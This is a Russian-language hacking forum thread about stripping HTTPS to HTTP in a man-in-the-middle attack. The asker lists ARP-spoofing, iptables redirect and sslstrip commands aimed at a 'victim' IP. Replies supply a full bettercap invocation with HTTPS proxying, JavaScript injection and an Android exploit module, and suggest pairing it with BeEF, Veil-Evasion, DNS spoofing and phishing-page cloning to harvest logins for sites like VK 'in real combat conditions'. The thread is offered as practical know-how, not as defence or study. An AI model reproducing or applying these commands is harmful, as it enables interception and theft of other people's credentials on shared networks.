Подменна HTTPS на HTTP

[Kiagen]

юзаю вот это ПО bettercap ettercap wireshark Sslstrip ARPspoof ничего не получается делаю все так же как написано в инструкции или в видео ничего не выходит )помогите пжл)

 

[Вадим]

поконкретнее плиз, что делал, как делал, что не получается??

 

[Kiagen]

поконкретнее плиз, что делал, как делал, что не получается??

Ну во первых юзал bettercap включил bettercap --proxy - P POST чтоб захватывало все устройства та и по отдельности делал и заметил что работает только если прописывать адрес в адресной строке например vk.com подмена протокола произойдет но если зайти в гугл и в гугле ввести vk.com и перейти то никакой замены не будет но люди же заходят в вк как ? они пишут "мл" а гугл уже выводит их на вк ,или же по закладкам или просто пишут Вк/вконтакте и через гугл потом заходят )потом юзал sslstrip т.е включил форвардинг пакетов echo "1" > /proc/sys/net/ipv4/ip_forward потом настроил IPtables iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 потом запустил sslstrip на прослушку порта заданого 8080 sslstrip -l 8080 потом включил ARPspoof командой arpspoof -i wlan0 -t 192.168.0.103 192.168.0.1 ГДЕ 192.168.0.103 IP жертвы а 192.168.0.1 IP роутера и ничего не работает ) потом делал чуть по другому ) включил форвардинг настроил IPtables включил sslstrip включил ettercap выбрал интерфейс просканил сеть выбрал роутер и пк включил MITM и тоже ничего не пашет ( а иногда при включении ettercap на компе жертвы пропадает интернет ) ВОТ ТАК крч ( все делал на своих ноутбуках ноут атакуещего Kali linux rolling с последними обновами жертва как и на Windows 7 была так и на Windows 10 была )

 

[Вадим]

потом включил ARPspoof командой arpspoof -i wlan0 -t 192.168.0.103 192.168.0.1 ГДЕ 192.168.0.103 IP жертвы а 192.168.0.1 IP роутера и ничего не работает ) потом делал чуть по другому ) включил форвардинг настроил IPtables включил sslstrip включил ettercap выбрал интерфейс просканил сеть выбрал роутер и пк включил MITM и тоже ничего не пашет ( а иногда при включении ettercap на компе жертвы пропадает интернет

А почему ты выбираеш роутер, надо выбирать IP атакующего и IP жертвы

 

[Kiagen]

А почему ты выбираеш роутер, надо выбирать IP атакующего и IP жертвы

0_0 сейчас попробую ведь на всех видео говорят вот так : на 9.50 глянь он как раз таки сделал так как я и написал

 

[z3RoTooL]

посмотри мой видос, может получится.. тестил на виртуалке, всё работает

 

[/\/\17R4]

Попробуй так:
1)Сначала обнови gems на всякий случай - gem update (можно вообще установить bettercap из гемов - gem install bettercap)
2)Качни доп. модули bettercap - git clone https://github.com/evilsocket/bettercap-proxy-modules.git
3)На мой взгляд команда на запуск в твоём случае должна выглядеть так - sudo bettercap -I wlan0 -G 192.168.0.1 -X --random-mac --sniffer-output ~/target_essid.cap --proxy --proxy-https --proxy-module injectjs --js-url

Ссылка скрыта от гостей

(в случае использования в связке с beef/beef+metasploit) --proxy-module ~/bettercap-proxy-modules/http/androidpwn.rb --command whoami (в случае если в сети андройд устройства)

 

[kot-gor]

Вышеуказанные методы неплохо справляются с логином и паролем, отправленные методом POST, и в принципе я особо не удивлен что человек не добился желаемого результата, сам прошел через похожие грабли...)Попробую пояснить, причина в том, что вы делали это не на виртуальной машине, а на реальном компьютере на котором уже входили на сайт " в контакте", и ваша система запомнила ваш вход. Если вы сделаете на чистой виртуальной машине у вас все получиться... По поводу ettercap , забудьте его, я считаю эту утилиту пережитком прошлого. и долго и муторно... Юзайте mitmf либо bettercap. Да кстати, иногда подвисает , вышел из этого включением IP forwarding перед запуском bettercap. Если же говорить про реальные боевые условия то запуская Bettercap строкой "bettercap --proxy - P POST" вы много не получите..). Советую использовать Bettercap в связке с Beef и Veil-Evasion ,либо как вариант Bettercap в режиме dns спуфинга и в связке с setoolkit (легко делает клон нужной веб страницы). Вариантов множество, все зависит от вашей фантазии, знаний и упорства...


https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/

 

[mrx13]

Вышеуказанные методы неплохо справляются с логином и паролем, отправленные методом POST, и в принципе я особо не удивлен что человек не добился желаемого результата, сам прошел через похожие грабли...)Попробую пояснить, причина в том, что вы делали это не на виртуальной машине, а на реальном компьютере на котором уже входили на сайт " в контакте", и ваша система запомнила ваш вход. Если вы сделаете на чистой виртуальной машине у вас все получиться... По поводу ettercap , забудьте его, я считаю эту утилиту пережитком прошлого. и долго и муторно... Юзайте mitmf либо bettercap. Да кстати, иногда подвисает , вышел из этого включением IP forwarding перед запуском bettercap. Если же говорить про реальные боевые условия то запуская Bettercap строкой "bettercap --proxy - P POST" вы много не получите..). Советую использовать Bettercap в связке с Beef и Veil-Evasion ,либо как вариант Bettercap в режиме dns спуфинга и в связке с setoolkit (легко делает клон нужной веб страницы). Вариантов множество, все зависит от вашей фантазии, знаний и упорства...

так же еще могу порекомендовать софт под названием Intercepter-NG довольно-таки интересный софт, тоже может работать с клонированием страниц

 

[kot-gor]

Добрый вечер.Раз уж затронули тему,может у кого есть опыт проведения mitm на андройд версии выше 4.2 ? С положительным результатом и родным браузером...